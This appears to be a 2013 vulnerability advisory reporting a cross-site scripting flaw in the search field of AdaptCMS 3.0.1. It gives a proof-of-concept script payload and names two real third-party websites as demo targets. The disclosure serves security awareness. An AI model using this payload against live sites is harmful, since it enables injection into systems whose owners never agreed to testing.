AdaptCMS 3.0.1 Cross Site Scripting Vulnerability

Author      : syst3m_f4ult
Homepage    : http://www.adaptcms.com/
Vendor      : Adapt CMS
Version     : 3.0.1 (probably all versions)
Tested on   : ubuntu 12.04
Date        : 2013-10-11
-----------------------------------------------------------------------

I.  POC & Exploit
-----------------------------------------------------------------------
The following page is vulnerable to XSS (Method: POST):
http://localhost/search <http://localhost/login/> [data[Search][q]
parameter]

Insert the following code inside the search box and hit Enter
<script>alert('syst3m_f4ult')</script>

Demo:
http://www.solitudeisbliss.com/search/
http://www.insanevisions.com/search/